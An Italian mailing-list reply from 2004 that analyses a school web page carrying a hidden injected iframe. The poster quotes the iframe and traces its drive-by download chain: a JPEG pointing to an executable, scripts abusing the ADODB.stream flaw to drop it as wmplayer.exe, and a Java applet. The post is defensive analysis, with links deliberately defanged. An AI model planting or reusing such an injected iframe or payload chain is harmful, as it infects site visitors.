erlug
[Top] [All Lists]

Re: [Erlug] [Fwd: [Mozilla-it] codice maligno, Mozilla ed Explorer]

To: erlug@xxxxxxxxxxxxxx
Subject: Re: [Erlug] [Fwd: [Mozilla-it] codice maligno, Mozilla ed Explorer]
From: "Guido Bolognesi [Zen]" <zen@xxxxxxxxx>
Date: Sun, 10 Oct 2004 20:39:34 +0200
[premessa: i link che trovate nella mail sono stati alterati per evitare che qualcuno ci cliccasse sopra. Pertanto htttp e` da leggersi come http. Se proprio volete fare le prove almeno dovete cancellare una 't' :)]

Francesca Campora wrote:
un trojan. Facendo ricerche abbiamo scovato che nel codice compariva:
<iframe src="http://b00gle.info/fa/?d=get"; width=0
heigth=0></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
però questo si vede solo leggendo il source da Mozilla e non da Internet
Explorer.
Dove risiede veramente il codice che si vede con Mozilla?

roadrunner/tmp> wget \
htttp://www.bdp.it/scuolaprimariasanbortolo/html/linkutili.htm

roadrunner/tmp> fgrep -i b00 linkutili.htm
<iframe src="htttp://b00gle.info/fa/?d=get" width=0 heigth=0></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

Quindi direi che si trova nella pagina. :)

Il motivo per cui non lo vedi con explorer e` che forse "sistema" la pagina prima di fartela vedere, cosa che Mozilla non fa. La posizione del tag <iframe> e` illegale nel punto in cui si trova (almeno per quello che so io di html). La vera domanda che mi farei e` "come ha fatto a finire li' quel codice". Non credo che ce l'abbia messo FireWorks, che puo' avere molti difetti ma non quello di infettare le pagine, credo...

Guardando piu' attentamente, si notano alcune peculiarita`:
- b00gle.info punta ad un indirizzo ip coreano (www.hauteoverseaswedding.co.kr dice il server che ti da la pagina)
- la pagina specifica (/fa/?d=get) contiene 6 iframe e nessun dato
- 5 dei 6 iframe puntano a xpire.info, che e` lo stesso ip di b00gle, a file come
        blok.jpg [1]
        t3.htm [2]
        x.htm [3]
        runevil.htm [4]
        proc.htm [5]

[1] non ho aperto il file, che e` un jpeg valido a giudicare dall'header, ma e` buffo che contenga tra le stringhe htttp://xpire.info/fa/aga.exe che e` un eseguibile per windows con un riferimento molto chiaro a KERNEL32.dll, non pensate? Io non sono mai riuscito a salvare un .jpg che puntasse ad un eseguibile sul web, sono anche un po' invidioso :P [2] e` un file html che tenta di caricare un curioso javascript (htttp://xpire.info/fa/ssload.js) che contiene una interessante funzione "getRealShell" che punta a "htttp://xpire.info/fa/ss.js". Questo ss.js a sua volta sfruttando il bug dell'ADODB.stream cerca di caricare con ActiveXObject... guarda caso il nostro amico aga.exe! Poi tenta di salvarlo come "C:\Program Files\Windows Media Player\wmplayer.exe". [3], [4] e [5] vengono lasciati al lettore che come me ha un quarto d'ora da perdere.

- il sesto iframe punta a un ip russo per una pagina (/dl/adv121.php) che a naso prova ad eseguire un .jar in local security zone di IE.

Morale: una pagina che tenta in tutti i modi possibili di trojanare il pc che vede il link. Spero che nessuno abbia cliccato da un IE non _ultimissima_ versione, compresi i lettori di questa lista.

ciao!
g.

<Prev in Thread] Current Thread [Next in Thread>